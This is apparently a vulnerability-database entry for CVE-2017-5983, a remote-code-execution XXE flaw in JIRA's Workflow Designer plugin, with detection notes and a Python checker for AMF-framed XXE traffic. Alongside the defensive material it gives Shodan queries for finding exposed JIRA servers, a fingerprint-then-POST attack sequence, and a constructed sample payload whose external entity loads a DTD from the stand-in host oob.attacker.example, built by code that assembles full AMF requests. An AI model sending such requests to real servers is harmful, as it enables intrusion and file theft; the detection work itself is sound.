CVE-2017-5983
Published 2017-04-10
Priority P2 · 67 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 16.24% (96.5th percentile)
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
Affected
66 ranges indexed for atlassian / jira; the version range and fixed-in values were not extracted for any of them (per the description above, JIRA Server before 6.3.0 is affected).
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | jira | — | — |
Detection & IOCs (extracted from sources)
- URL: /plugins/servlet/jwd/amf/
- Bytes: \x00\x00\x00\x00\x00\x01 (AMF version 0, zero headers, one message)
- Bytes: \x0f (AMF0 xml-document type marker)
- Exploit traffic targets the AMF servlet endpoint at /plugins/servlet/jwd/amf/ via HTTP POST with Content-Type: application/xml, carrying a crafted AMF-framed XXE payload.
- Fingerprint vulnerable JIRA instances by checking for the string 'title="JiraVersion"' in the body of /secure/Dashboard.jspa or /jira/secure/Dashboard.jspa before attempting exploitation.
- The AMF request body begins with a fixed two-byte version field (\x00\x00), a two-byte header count (\x00\x00) and a two-byte message count (\x00\x01), followed by the target and response URIs as strings with a two-byte big-endian length prefix. Look for this binary framing in POST bodies to /plugins/servlet/jwd/amf/.
- The XXE payload is embedded in the AMF body as an AMF0 xml-document value: the marker byte 0x0f, a four-byte big-endian length, then the XML text. Detection should look for 0x0f followed by an XML DOCTYPE or entity declaration in POST bodies to the AMF endpoint.
- Shodan queries for exposed JIRA instances: search for http.title:"system dashboard - jira", http.component:"atlassian jira", or cpe:"cpe:2.3:a:atlassian:jira".
- Successful exploitation is confirmed via an out-of-band HTTP callback (interactsh); monitor for unexpected outbound HTTP connections from the JIRA server process following a POST to /plugins/servlet/jwd/amf/.
- The vulnerability affects JIRA Server versions before 6.3.0; the template name and title contain a typo stating '> 6.3.0', which is incorrect. Detection and blocking should target instances running versions prior to 6.3.0.
- The exploit requires two sequential HTTP requests: a GET to confirm the JIRA version fingerprint, then the POST carrying the AMF/XXE payload. Single-request detections will miss the full attack chain.
- The POST request is marked 'unsafe: true' in the Nuclei template, which makes Nuclei send it through its raw HTTP client without normalization; the bytes on the wire therefore need not match what a standards-conforming client would produce, so network-level detection (IDS/WAF) should inspect the raw TCP stream to the AMF endpoint rather than rely only on fully parsed request fields.
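The framing and marker checks from the list above, written out as a checker that runs over a raw POST body. This is an added example, not code from the page, from Atlassian or from the Nuclei template. It assumes the AMF0 envelope and xml-document encodings as described above (u16 version, u16 header count, u16 message count, u16-length-prefixed target and response URIs, u32 message length, then 0x0f + u32 length + XML). The sample requests, the target/response URIs `exampleService.exampleMethod` and `/1`, and the out-of-band host `oob.attacker.example` are constructed for illustration and are not taken from any real exploit.

```python
"""Checker for AMF0-framed XXE payloads aimed at the JIRA Workflow Designer AMF
servlet (CVE-2017-5983). Added example, not code from the page, Atlassian or the
Nuclei template; the sample requests at the bottom are constructed."""
import re
import struct
from dataclasses import dataclass

AMF_ENDPOINT = "/plugins/servlet/jwd/amf/"
AMF0_XML_MARKER = 0x0F  # AMF0 xml-document value: 0x0f, u32 length, UTF-8 text
# a DOCTYPE or ENTITY declaration is what turns an XML value into an XXE vector
XXE_PATTERN = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

@dataclass
class Amf0Message:
    target: str           # remoting target URI
    response: str         # response URI, conventionally "/1", "/2", ...
    declared_length: int  # u32 body length; 0xFFFFFFFF means "unknown"
    body: bytes

def _unpack(fmt, buf, pos):
    """Read one big-endian field, refusing to run past the end of the buffer."""
    size = struct.calcsize(fmt)
    if pos + size > len(buf):
        raise ValueError("truncated field at %d" % pos)
    return struct.unpack_from(fmt, buf, pos)[0], pos + size

def _short_string(buf, pos):
    """AMF0 short string: u16 big-endian length followed by UTF-8 bytes."""
    n, pos = _unpack(">H", buf, pos)
    if pos + n > len(buf):
        raise ValueError("truncated string at %d" % pos)
    return buf[pos:pos + n].decode("utf-8", "replace"), pos + n

def parse_amf0_envelope(packet):
    """Walk the AMF envelope: version, header count, message count, then per
    message the target URI, response URI, u32 length and body bytes."""
    version, pos = _unpack(">H", packet, 0)
    if version not in (0, 3):  # 0 = AMF0 client, 3 = AMF3-capable client
        raise ValueError("not an AMF packet (version %d)" % version)
    header_count, pos = _unpack(">H", packet, pos)
    if header_count:  # headers carry arbitrary AMF values; not decoded here
        raise ValueError("%d AMF headers present, not decoded" % header_count)
    message_count, pos = _unpack(">H", packet, pos)
    messages = []
    for _ in range(message_count):
        target, pos = _short_string(packet, pos)
        response, pos = _short_string(packet, pos)
        length, pos = _unpack(">I", packet, pos)
        end = len(packet) if length == 0xFFFFFFFF else pos + length
        if end > len(packet):
            raise ValueError("message length exceeds packet")
        messages.append(Amf0Message(target, response, length, packet[pos:end]))
        pos = end
    return version, messages

def find_xxe(messages):
    """Return (message_index, marker_offset, xml) for every AMF0 xml-document value
    whose declared length fits in the body and whose text carries a DOCTYPE/ENTITY
    declaration. Scanning every 0x0f offset also catches XML nested in an array."""
    hits = []
    for i, msg in enumerate(messages):
        body = msg.body
        for off, byte in enumerate(body):
            if byte != AMF0_XML_MARKER or off + 5 > len(body):
                continue
            n = struct.unpack_from(">I", body, off + 1)[0]
            xml = body[off + 5:off + 5 + n]
            if len(xml) == n and XXE_PATTERN.search(xml):
                hits.append((i, off, xml))
    return hits

def inspect_request(path, body):
    """Classify one POST: 'ignore' (other path), 'malformed', 'amf-clean' or 'xxe-in-amf'."""
    if not path.startswith(AMF_ENDPOINT):
        return "ignore", []
    try:
        _, messages = parse_amf0_envelope(body)
    except ValueError:
        return "malformed", []
    hits = find_xxe(messages)
    return ("xxe-in-amf" if hits else "amf-clean"), hits

# constructed sample traffic; target/response URIs and the OOB host are hypothetical
def amf0_xml_value(xml):
    return bytes([AMF0_XML_MARKER]) + struct.pack(">I", len(xml)) + xml

def build_amf0_request(value, target="exampleService.exampleMethod", response="/1"):
    """Encode one AMF0 packet (version 0, no headers, one message) around a value."""
    def s(text):
        b = text.encode()
        return struct.pack(">H", len(b)) + b
    return (b"\x00\x00\x00\x00\x00\x01" + s(target) + s(response)
            + struct.pack(">I", len(value)) + value)

XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM '
           b'"http://oob.attacker.example/x.dtd"> %dtd;]><x/>')
BENIGN_XML = b"<workflow><step>ok</step></workflow>"
XXE_REQUEST = build_amf0_request(amf0_xml_value(XXE_XML))
BENIGN_REQUEST = build_amf0_request(amf0_xml_value(BENIGN_XML))

if __name__ == "__main__":
    for label, req in (("xxe", XXE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(AMF_ENDPOINT, req)[0])
```

Two design points matter for a WAF or IDS rule built on this. First, the checker only accepts a 0x0f byte as an xml-document marker when the u32 length that follows it fits inside the message body; a bare "0x0f followed by DOCTYPE" signature would also fire on stray 0x0f bytes inside other binary values. Second, it rejects packets that carry AMF headers instead of decoding them, so a production deployment needs a full AMF0 value decoder to avoid a blind spot there. Feed it the request body exactly as it arrived on the wire: as noted above, the Nuclei request is sent unnormalized, so reconstructing the body from parsed fields can lose the framing the check depends on.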
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Nuclei
CVE-2017-5983 [CRITICAL] JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE) · CVSS 9.8
Template (only the info block is indexed):
```yaml
id: CVE-2017-5983

info:
  name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
  author: us3r777,Synacktiv
  severity: critical
  description: |
    The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
```
No writeups or analysis indexed.
References
- http://codewhitesec.blogspot.com/2017/04/amf.html
- http://www.securityfocus.com/bid/97379
- https://confluence.atlassian.com/jira063/jira-security-advisory-2017-03-09-875604401.html
- https://jira.atlassian.com/browse/JRASERVER-64077
- https://www.kb.cert.org/vuls/id/307983